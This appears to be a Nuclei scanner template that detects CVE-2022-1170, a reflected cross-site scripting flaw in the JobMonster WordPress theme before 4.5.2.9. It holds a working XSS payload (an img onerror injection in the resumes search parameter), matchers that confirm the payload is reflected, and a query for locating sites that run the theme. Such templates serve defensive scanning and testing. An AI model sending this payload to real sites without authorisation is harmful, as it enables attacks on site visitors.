52 lines
1.6 KiB
YAML
52 lines
1.6 KiB
YAML
id: CVE-2022-1170
|
|
|
|
info:
|
|
name: JobMonster < 4.5.2.9 - Cross-Site Scripting
|
|
author: Akincibor,ritikchaddha
|
|
severity: medium
|
|
description: |
|
|
In the theme JobMonster < 4.5.2.9 there is a XSS vulnerability as the input for the search form is provided through unsanitized GET requests.
|
|
reference:
|
|
- https://wpscan.com/vulnerability/2ecb18e6-b575-4a20-bd31-94d24f1d1efc
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-1170
|
|
- https://themeforest.net/item/jobmonster-job-board-wordpress-theme/10965446
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2022-1170
|
|
cwe-id: CWE-79
|
|
epss-score: 0.001
|
|
epss-percentile: 0.40832
|
|
cpe: cpe:2.3:a:nootheme:jobmonster:*:*:*:*:*:wordpress:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: nootheme
|
|
product: jobmonster
|
|
framework: wordpress
|
|
publicwww-query: "/wp-content/themes/noo-jobmonster"
|
|
tags: cve,cve2022,wpscan,wp,wp-theme,wordpress,xss,jobmonster,nootheme
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/resumes/?s=%22%3E%3Cimg+src%3Dx+onerror%3Dalert(document.domain)%3E'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- '<img src=x onerror=alert(document.domain)>'
|
|
- 'noo-resume'
|
|
condition: and
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "text/html"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4a0a00473045022100dea0198bfd812372a3e4096ee47b971537dd9fed4b8a105cd6a80b40066fb54902202e198a413b260daf75bf57682d6586e9726f887f28affa16d9f1bfc85ed5dc95:922c64590222798bb761d5b6d8e72950 |